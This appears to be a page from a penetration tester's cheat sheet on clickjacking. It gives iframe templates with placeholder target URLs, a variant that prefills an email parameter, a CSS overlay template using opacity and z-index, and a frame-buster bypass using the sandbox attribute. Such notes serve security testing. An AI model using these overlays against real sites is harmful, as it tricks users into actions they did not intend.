OFFENSIVE | DEFENSIVE | WIKI | ABOUT

<<



GENERAL INFORMATION
NOTES:

- The goal is to trick the user to make them to click on things that are not 100% real, i mean, it is some kind of decoy to make the 
user to do what you want.
- Normally it is used with the iframe tag.
- Check the code, URL attempts can be completed.
- Validate the CSRF token.

SAMPLE IFRAMES

::: GENERAL IFRAME TEST	

<iframe src="URL_TO_CLICKJACK"></iframe>

You can add any URL that you can attack as source reference. 

.C1.
	
::: URL PARAMETERS
	
<iframe src="URL_TO_CLICKJACK/[email protected]"></iframe>

In here the parameter that we are using to attack is email, so, the parameter is defined. Inspection of the requests are needed. 

.C2.	
	
TEMPLATE STYLE

<style>
    iframe {
        position:relative;
        width:_value;
        height: _value;
        opacity: _opacity;
        z-index: 2;
    }
    div {
        position:absolute;
        top:_value;
        left:_value;
        z-index: 1;
    }
</style>
	


BYPASS PROTECTION
:::>  FRAME BUSTER

Normally, the attribute sandbox="allow-forms" neutralize the frame buster. So a simple iframe tag can help to confirm if
it is allowed or not. If the URL is reflected, it means it is not blocked. 

SAMPLE:

<iframe sandbox="allow-forms" src="URL_TO_CLICKJACK/[email protected]"></iframe>
	
.C3.	
	

GO BACK